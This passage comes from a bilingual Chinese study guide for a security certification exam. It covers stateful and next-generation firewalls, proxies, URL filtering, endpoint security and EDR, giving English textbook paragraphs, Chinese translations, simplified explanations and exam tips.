source of origin (i.e., local or remote, physical port, or even routed path/vector), and the relationship between current packets and the previous packets of the same session, stateful inspection firewalls are able to grant a broader range of access for authorized users and activities and actively watch for and block unauthorized users and activities. Stateful inspection firewalls operate at OSI layers 3 and up. A stateful inspection firewall is aware that any valid outbound communication (especially related to TCP) will trigger a corresponding response or reply from the external entity. Thus, this type of firewall automatically creates a temporary response rule for the request.

But that rule exists only as long as the conversation is taking place. Additionally, stateful inspection firewalls can retain knowledge of previous packets in a conversation to detect unwanted or malicious traffic that isn't noticeable or detectable when evaluating only individual packets. This is known as context analysis or contextual analysis. A stateful inspection firewall may also perform deep packet inspection (DPI), which is the analysis of the payload or content of a packet. Deep packet inspection (DPI), payload inspection, or content filtering is the means to evaluate and filter the payload contents of a communication rather than only on the header values.

DPI can also be known as complete packet inspection and information extraction. DPI filtering is able to block domain names, malware, spam, malicious scripts, abusive content, or other identifiable elements in the payload of a communication. DPI is often integrated with application-layer firewalls and/or stateful inspection firewalls.

Next-Generation Firewalls (NGFWs) A next-generation firewall (NGFW) is a multifunction device (MFD) or unified threat management (UTM) composed of several security features in addition to a firewall; integrated components can include application filtering, deep packet inspection, TLS offloading and/or inspection (aka TLS termination proxy), domain name and URL filtering, IDS, IPS, web content filtering, QoS management, bandwidth throttling/management, NAT, VPN anchoring, authentication services, identity management, and antivirus/antimalware scanning.

中文直译 / 整理

来源(即本地或远程、物理端口,甚至路由路径/向量),以及当前数据包与 同一会话中先前数据包之间的关系,有状态检查防火墙能够为授权用户和活动 提供更广泛的访问权限,并主动监控和阻止未授权用户和活动。 有状态检查防 火墙在OSI模型的第3层及以上层运行。 有状态检查防火墙能够识别任何有效的出站通信(尤其是与TCP相关的通 信)都会触发来自外部实体的相应响应或回复。 因此,这种类型的防火墙 会自动为请求创建一个临时的响应规则。 但该规则仅在会话进行期间存在。 此外,有状态检查防火墙可以保留会话中先前数据包的信息,以检测在仅评 估单个数据包时无法察觉或发现的不需要或恶意流量。 这被称为上下文分析 或情境分析。 有状态检查防火墙还可能执行深度包检测(DPI),即对数据 包的有效载荷或内容进行分析。 深度包检测(DPI)、有效载荷检测或内容过滤是指评估和过滤通信的 有效载荷内容,而不仅仅是基于头部值。 DPI 也可称为完整包检测和信息提 取。 DPI 过滤能够阻止通信有效载荷中的域名、恶意软件、垃圾邮件、恶意 脚本、滥用内容或其他可识别元素。 DPI 通常与应用层防火墙和/或有状态 检查防火墙集成。

下一代防火墙(NGFW)一种下一代防火墙(NGFW)是一种多功能设备 (MFD)或统一威胁管理(UTM),除防火墙外还集成了多种安全功能; 集成组件可包括应用程序过滤、深度包检测、TLS卸载和/或检测(即TLS终 止代理)、域名和URL过滤、IDS、IPS、网页内容过滤、QoS管理、带宽 限速/管理、NAT、VPN锚定、身份验证服务、身份管理和防病毒/反恶意软 件扫描。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
防火墙 防火墙根据规则控制网络流量进出。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
学习单元 86 / PDF P804

第 804 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

A host-based firewall, local, software, or personal firewall, is a security application that is installed on client systems. A host-based firewall provides protection for the local system from the activities of the user and from communications from the network or the Internet. It can often limit communications of installed applications and protocols and can block externally initiated connections. A host-based firewall can be a simple static filtering firewall, stateful inspection, or even an NGFW. Internal Segmentation Firewall (ISFW) An internal segmentation firewall (ISFW) is a firewall deployed between internal network segments or company divisions.

Its purpose is to prevent the further spread of malicious code or harmful protocols already within the private network. With an ISFW, network segments can be created without resorting to air gaps, VLANs, or subnet divisions. An ISFW is commonly used in micro-segmentation architectures. Proxy A proxy server is a variation of an application-level firewall or circuit-level firewall. A proxy server is used to mediate between clients and servers. Proxies are most often used in the context of providing clients on a private network with internet access while protecting the identity of the clients.

Often a proxy serves as a barrier against external threats to internal clients by accepting requests from clients, altering the source address of the requester, maintaining a mapping of requests to clients, and sending the altered request packets out. Once a reply is received, the proxy server determines which client it is destined for by reviewing its mappings and then sends the packets to the originally requesting client. This is effectively NAT (see Chapter 12). In addition to features such as NAT, proxy servers can provide caching and site or content filtering. A forward proxy is a standard or common proxy that acts as an intermediary for queries of external resources.

A forward proxy handles queries from internal clients when accessing outside services. A reverse proxy provides the opposite function of a forward proxy; it handles inbound requests from external systems to internally located services. A reverse proxy is similar to the functions of port forwarding and static NAT. A

中文直译 / 整理

一种基于主机的防火墙,即本地软件防火墙或个人防火墙,是安装在客 户端系统上的安全应用程序。 基于主机的防火墙可保护本地系统免受用户活 动以及来自网络或互联网的通信的威胁。 它通常能够限制已安装应用程序和 协议的通信,并可阻止外部发起的连接。 基于主机的防火墙可以是简单的静 态过滤防火墙、状态检测防火墙,甚至可以是NGFW。 内部隔离防火墙 (ISFW) 内部隔离防火墙(ISFW) 是部署在内部网络段或公 司部门之间的防火墙。 其目的是防止已存在于私有网络中的恶意代码或有害协议 进一步传播。 通过使用 ISFW,可以在不使用空气隔离、VLAN 或子网划分的情 况下创建网络段。 ISFW 通常用于微分段架构中。 代理 一个 代理服务器 是应用层防火墙或电路层防火墙的一种变体。 代理服务器用于 在客户端与服务器之间进行中介。 代理通常用于为私有网络上的客户端提供互 联网访问,同时保护客户端的身份。 代理通常充当抵御外部威胁的屏障,通过 接受客户端的请求、更改请求者的源地址、维护请求与客户端的映射关系,并 发送经过修改的请求数据包来实现。

当收到回复后,代理服务器通过检查其映 射关系确定目标客户端,然后将数据包发送给最初发出请求的客户端。 这实际 上就是 NAT(参见 第 12 章)。 除了 NAT 功能外,代理服务器还可以提供缓 存以及网站或内容过滤功能。 一个 正向代理 是一种作为外部资源查询中介的标准或常见代理。 正向代理在 内部客户端访问外部服务时处理查询。 一个 反向代理 提供与正向代理相反的功能; 它处理来自外部系统的入站请求, 以访问内部服务。 反向代理的功能类似于端口转发和静态NAT。 一个

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

防火墙:防火墙根据规则控制网络流量进出。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 804 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
防火墙 防火墙根据规则控制网络流量进出。
身份 身份是主体在系统中的标识。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 87 / PDF P805

第 805 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

reverse proxy is sometimes used on the border of a screened subnet to use private IP addresses on resource servers but allows for visitors from the public internet. If a client is not configured (Figure 11.8, left) to send queries directly to a proxy, but the network routes outbound traffic to a proxy anyway, then a transparent proxy is in use. A nontransparent proxy is in use when a client is configured (Figure 11.8, right) to send outbound queries directly to a proxy. The settings for a nontransparent proxy can be set manually or using a proxy auto-config (PAC) file. PAC can be implemented with a script or via DHCP.

FIGURE 11.8 The configuration dialog boxes for a transparent (left) versus a nontransparent (right) proxy Content/URL Filter Content filtering or content inspection is the security-filtering function in which the contents of the application protocol payload are inspected. Often, such inspection is based on keyword matching. A primary block list of unwanted terms, addresses, or URLs is used to control what is or isn't allowed to reach a user. This is sometimes known as deep packet inspection. Malware inspection is the use of a malware scanner to detect unwanted software content in network traffic.

URL filtering, also known as web filtering, is the act of blocking access to a site based on all or part of the URL used to request access. URL filtering can focus on all or part of a fully qualified domain name (FQDN), specific pathnames, filenames, file extensions, or entire URLs. Many URL-filtering

中文直译 / 整理

反向代理有时用于隔离子网的边界,以便在资源服务器上使用私有IP地址, 同时允许来自公共互联网的访问者。 如果客户端未配置(图11.8,左侧)直接向代理发送查询,但网络仍将出站流 量路由到代理,则正在使用透明代理。 当客户端已配置(非透明代理,右侧) 直接向代理发送出站查询时,正在使用图11.8。 非透明代理的设置可以通过手 动方式或使用代理自动配置(PAC)文件进行设置。 PAC可以通过脚本或 DHCP实现。 图11.8 透明代理(左侧)与非透明代理(右侧)的配置对话框 内容/URL过滤 内容过滤或内容检查是一种安全过滤功能,用于检查应用协议负载的内容。 通常,此类检查基于关键词匹配。 通过使用一个主要的不希望出现的术语、地 址或URL的阻止列表,来控制哪些内容允许或不允许到达用户。 这有时被称 为深度包检测。 恶意软件检查是使用恶意软件扫描程序检测网络流量中 unwanted 软件内容的过程。 URL过滤,也称为网页过滤,是根据用于请求访问的URL的全部或部分 来阻止访问网站的行为。 URL过滤可以针对完全限定域名(FQDN)的全部 或部分、特定路径名、文件名、文件扩展名或整个URL。 许多URL过滤

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

程序:程序是一步一步怎么做。

日志:日志记录系统和用户活动,用于监控、审计和调查。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 805 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 88 / PDF P806

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

tools can obtain updated primary URL block lists from vendors as well as allow administrators to add or remove URLs from a custom list. A web security gateway is a device that is a web-content filter (often URL and content keyword–based) that also supports malware scanning. Some web security gateways incorporate non-web features as well, including instant messaging (IM) filtering, email filtering, spam blocking, and spoofing detection. Thus, some are considered to be UTMs or NGFWs. Endpoint Security Managing network security with filtering devices such as firewalls and proxies is important, but you must not overlook the need for endpoint security.

Endpoint security is the concept that each individual device must maintain local security, whether or not its network or telecommunications channels also provide security. Sometimes, this is expressed as “The end device is responsible for its own security” or host-based security. However, a clearer perspective is that any weakness in a network, whether on the border, on a server, or on a client, presents a risk to all elements within the organization.

As computing has evolved from a host/terminal model (where users could be physically distributed, but all functions, activity, data, and resources reside on a single centralized system) to a client/server model (where users operate independent, fully functional desktop computers but also access services and resources on networked servers), security controls and concepts have had to evolve to follow suit. This means that clients have computing and storage capabilities and, typically, multiple servers do likewise. The concept of a client/server model network is also known as a distributed system or a distributed architecture.

Thus, security must be addressed everywhere instead of at a single centralized host. From a security standpoint, this means that because processing and storage are distributed on multiple clients and servers, all those computers must be properly secured and protected. It also means that the network links between clients and servers (and in some cases, these links may not be purely local) must also be secured and protected. When evaluating security architecture, be sure to include an assessment of the needs and risks related to distributed architectures. Distributed architectures are prone to vulnerabilities that are unthinkable in monolithic host/terminal systems.

Desktop systems can contain sensitive information that may be at some risk of being exposed and must, therefore,

中文直译 / 整理

工具可以从供应商处获取更新的主URL阻塞列表,并允许管理员向自定义列表中添加或 删除URL。 一个 web security gateway 是一种网络内容过滤器(通常基于 URL 和内容关 键词),同时支持恶意软件扫描。 一些网络安全网关还集成了非 Web 功能,包 括即时消息(IM)过滤、电子邮件过滤、垃圾邮件拦截和欺骗检测。 因此,某 些网络安全网关被视为 UTM 或 NGFW。 终端安全 使用防火墙和代理等过滤设备管理网络安全很重要,但您不能忽视终端安全的 需求。 终端安全 是指每个独立设备都必须维护本地安全,无论其网络或电信通 道是否提供安全保护。 有时,这被表述为“终端设备对其自身的安全负责”或 基于主机的安全。 然而,更清晰的视角是:网络中的任何弱点,无论位于边界、 服务器还是客户端,都会对组织内的所有元素构成风险。 随着计算从主机/终端模型(用户在物理上分布,但所有功能、活动、数据和资 源都集中在单一中心化系统中)演变为客户端/服务器模型(用户操作独立的、 功能完备的桌面计算机,同时访问联网服务器上的服务和资源),安全控制和 概念也必须随之演进。 这意味着客户端具备计算和存储能力,通常多个服务器 也是如此。

客户端/服务器模型 网络的概念也被称为 分布式系统 或 分布式架构。 因此,安全必须在所有地方得到保障,而不仅仅是在单一的中心化主机上。 从 安全角度来看,这意味着由于处理和存储分布在多个客户端和服务器上,所有 这些计算机都必须得到妥善的安全防护。 同时,客户端与服务器之间的网络链 路(在某些情况下,这些链路可能并非纯粹本地)也必须加以保护。 在评估安 全架构时,请务必包含对分布式架构相关需求和风险的评估。 分布式架构容易出现单体主机/终端系统中无法想象的漏洞。 桌面系统可能包 含敏感信息,这些信息可能面临泄露风险,因此必须

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

防火墙:防火墙根据规则控制网络流量进出。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

RPO 问数据:最多丢到哪个时间点。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
防火墙 防火墙根据规则控制网络流量进出。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 89 / PDF P807

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

be protected. Individual users may lack general security savvy or awareness, and therefore, the underlying architecture has to compensate for those deficiencies. Desktop PCs, workstations, and laptops can provide avenues of access to critical information systems elsewhere in a distributed environment because users require access to networked servers and services to do their jobs. By permitting user machines to access a network and its distributed resources, organizations must also recognize that those user machines can become threats if they are misused or compromised. Such software and system vulnerabilities and threats must be assessed and addressed properly.

Communications equipment can also provide unwanted points of entry into a distributed environment. For example, modems attached to a desktop machine that's also attached to an organization's network can make that network vulnerable to dial-in attacks. There is also a risk that wireless adapters on client systems can be used to create open networks. Likewise, users who download data from the Internet increase the risk of infecting their own and other systems with malicious code, Trojan horses, and so forth. Desktops, laptops, tablets, mobile phones, and workstations—and associated disks or other storage devices—may not be secure from physical intrusion or theft.

Finally, when data resides only on client machines, it may not be secured with a proper backup (it's often the case that although servers are backed up routinely, the same is not true for client computers). You should see that the foregoing litany of potential vulnerabilities in distributed architectures means that such environments require numerous safeguards to implement appropriate security and to ensure that such vulnerabilities are eliminated, mitigated, or remedied. Clients must be subjected to policies that impose safeguards on their contents and their users' activities.

These include the following: Email must be screened so that it cannot become a vector for infection by malicious software; email should also be subject to policies that govern appropriate use and limit potential liability. Download/upload policies must be created so that incoming and outgoing data is screened and suspect materials are blocked. Systems must be subject to robust access controls, which may include multifactor authentication and/or biometrics to restrict access to enduser devices and to prevent unauthorized access to servers and services.

中文直译 / 整理

受到保护。 单个用户可能缺乏通用的安全知识或意识,因此底层架构必须弥补 这些不足。 桌面电脑、工作站和笔记本电脑可能为分布式环境中的其他关键信 息系统提供访问途径,因为用户需要访问网络服务器和服务来完成工作。 通过 允许用户机器访问网络及其分布式资源,组织也必须认识到,如果这些用户机 器被滥用或被攻破,它们也可能成为威胁。 此类软件和系统漏洞及威胁必须得 到恰当的评估和处理。 通信设备也可能为分布式环境提供不必要的入口点。 例如,连接到桌面计算机 且该计算机同时接入组织网络的调制解调器,可能使该网络易受拨号攻击。 此 外,客户端系统上的无线适配器也可能被用于创建开放网络。 同样,用户从互 联网下载数据会增加其自身及其他系统感染恶意代码、木马程序等的风险。 台 式机、笔记本电脑、平板电脑、移动电话和工作站——以及相关的磁盘或其他存 储设备——可能无法防范物理入侵或盗窃。 最后,当数据仅存在于客户端机器上 时,可能未进行适当的备份(通常情况下,虽然服务器会定期备份,但客户端 计算机却未必如此)。 您应当意识到,前述分布式架构中潜在漏洞的清单意味着此类环境需要实施多 种防护措施,以实现适当的安全性,并消除、缓解或修复这些漏洞。

必须对客 户端及其用户活动施加安全策略。 其中包括以下内容: 电子邮件必须进行筛查,以防止其成为恶意软件感染的传播途径; 电子邮 件还应受制于规范适当使用并限制潜在责任的政策。 必须制定下载/上传政策,以对传入和传出的数据进行筛查,并阻止 可疑材料。 系统必须实施强有力的访问控制,可包括多因素认证和/或生物识别技术, 以限制对终端用户设备的访问,并防止对服务器和服务的未授权访问。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

知道的、拥有的、固有的、所处位置、行为特征是常见因素。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
多因素认证 MFA 使用至少两类不同认证因素,提高认证可信度。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 90 / PDF P808

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

Restricted user-interface mechanisms and database management systems should be installed, and their use required, to restrict and manage access to critical information so that users have minimal but necessary access to sensitive resources. File encryption may be appropriate for files and data stored on client machines (indeed, drive-level encryption is a good idea for laptops and other mobile computing gear that is subject to loss or theft outside an organization's premises). Enforce screen savers after a timeout.

This will hide any confidential materials behind a screen saver, which should then require a valid login to regain access to the desktop, applications, storage devices, and so forth. It's essential to separate and isolate processes that run in user and supervisory modes so that unauthorized and unwanted access to highprivilege processes and capabilities is prevented. Protection domains or network segments should be created so that the compromise of a client won't automatically compromise an entire network.

Disks and other sensitive materials should be clearly labeled according to their security classification or organizational sensitivity; procedural processes and system controls should combine to help protect sensitive materials from unwanted or unauthorized access. Files on desktop machines, as well as files on servers, should be backed up—ideally, using some form of centralized backup utility that works with client agent software to identify and capture files from clients stored in a secure backup storage archive.

Desktop users need regular security awareness training to maintain proper security awareness; they also need to be notified about potential threats and instructed on how to deal with them appropriately. Desktop computers and their storage media require protection against environmental hazards (temperature, humidity, power loss/fluctuation, and so forth). Desktop computers should be included in your organization's disaster recovery and business continuity planning because they're potentially as

中文直译 / 整理

应安装并强制使用受限的用户界面机制和数据库管理系统,以限制和 管理对关键信息的访问,确保用户仅拥有访问敏感资源所必需的最小 权限。 文件加密可能适用于存储在客户端机器上的文件和数据(事实上,对于 容易在组织场所外丢失或被盗的笔记本电脑和其他移动计算设备,采用 磁盘级加密是一个好主意)。 在超时后强制启用屏幕保护程序。 这将把任何机密材料隐藏在屏幕保护程 序后面,屏幕保护程序应要求有效的登录才能重新访问桌面、应用程序、 存储设备等。 必须分离并隔离运行在用户模式和监督模式下的进程,以防止对高权限 进程和功能的未授权和非预期访问。 应创建保护域或网络段,以便客户端被攻破时不会自动导致整个 网络被攻破。 磁盘和其他敏感材料应根据其安全分类或组织敏感性明确标注; 程序流程 和系统控制应协同作用,以帮助保护敏感材料免受非预期或未授权的访问。 桌面计算机上的文件以及服务器上的文件都应进行备份——理想情况下,应 使用某种集中式备份工具,该工具通过客户端代理软件识别并捕获存储在 安全备份存储归档中的客户端文件。 桌面用户需要定期接受安全意识培训,以保持适当的安全意识; 他们还 应收到潜在威胁的通知,并获得如何妥善应对这些威胁的指导。

桌面计算机及其存储介质需要受到环境危害(温度、湿度、断电/电压波 动等)的保护。 台式计算机应纳入贵组织的灾难恢复和业务连续性计划中,因为它们在帮助 用户恢复到其他系统上工作方面可能同样重要

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

ISO 偏标准和管理体系。

Step-by-step、SOP 常对应 procedure。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
程序 程序是一步一步怎么做。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 91 / PDF P809

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

important as (if not more important than) other systems and services in getting users back to work on other systems. Developers of custom software built-in and for distributed environments also need to take security into account, including using formal methods for development and deployment, such as code libraries, change control mechanisms, configuration management, and patch and update deployment. In general, safeguarding distributed environments means understanding the vulnerabilities to which they're subject and applying appropriate safeguards.

These can (and do) range from technology solutions and controls to policies and procedures that manage risk and seek to limit or avoid losses, damage, unwanted disclosure, and so on. Configuring security on numerous endpoint devices can be complex, time-consuming, and tedious. The use of system imaging of a properly configured primary device will ensure the application of a consistent baseline across the upgraded endpoint devices. Endpoint detection and response (EDR) is a security mechanism that is an evolution of traditional antimalware products, IDS, and firewall solutions.

EDR seeks to detect, record, evaluate, and respond to suspicious activities and events, which may be caused by problematic software or by valid and invalid users. It is a natural extension of continuous monitoring focusing on both the endpoint device itself and network communications reaching the local interface. Some EDR solutions employ an on-device analysis engine, whereas others report events back to a central analysis server or to a cloud solution.

The goal of EDR is to detect abuses that are potentially more advanced than what can be detected by traditional antivirus programs or HIDSs, while optimizing the response time of incident response, discarding false positives, implementing blocking for advanced threats, and protecting against multiple threats occurring simultaneously and via various threat vectors. A few related concepts to EDR include managed detection and response (MDR), endpoint protection platform (EPP), and extended detection and response (XDR). MDR focuses on threat detection and mediation but is not limited to the scope of endpoints.

MDR is a service that attempts to monitor an IT environment in real time to quickly detect and resolve threats. Often, an MDR solution is a combination and integration of numerous technologies, including SIEM, network traffic analysis (NTA), EDR, and IDS. EPP is a variation of EDR, much like IPS is a variation of IDS. The focus of EPP is on four main security functions: predict, prevent, detect, and respond. (

中文直译 / 整理

甚至比其他系统和服务更重要) 自定义软件的开发者,无论是内置还是用于分布式环境,都需要考虑安全 性,包括使用正式方法进行开发和部署,例如代码库、变更控制机制、配 置管理以及补丁和更新部署。 通常,保护分布式环境意味着了解其面临的脆弱性并应用适当的防护措施。 这 些措施可以(且确实)涵盖从技术解决方案和控制到管理风险、旨在限制或避 免损失、损害、非预期披露等的政策和流程。 在大量终端设备上配置安全设置 可能复杂、耗时且枯燥。 通过使用已正确配置的主设备的系统镜像,可确保在 升级的终端设备上应用一致的基线。 终端检测与响应(EDR)是一种安全机制,是传统反恶意软件产品、入侵检测 系统(IDS)和防火墙解决方案的演进。 EDR旨在检测、记录、评估和响应可 疑活动和事件,这些活动和事件可能由有问题的软件或有效和无效用户引起。 它是持续监控的自然延伸,重点关注终端设备本身以及到达本地接口的网络通 信。 一些EDR解决方案采用设备端分析引擎,而其他解决方案则将事件报告回 中央分析服务器或云解决方案。

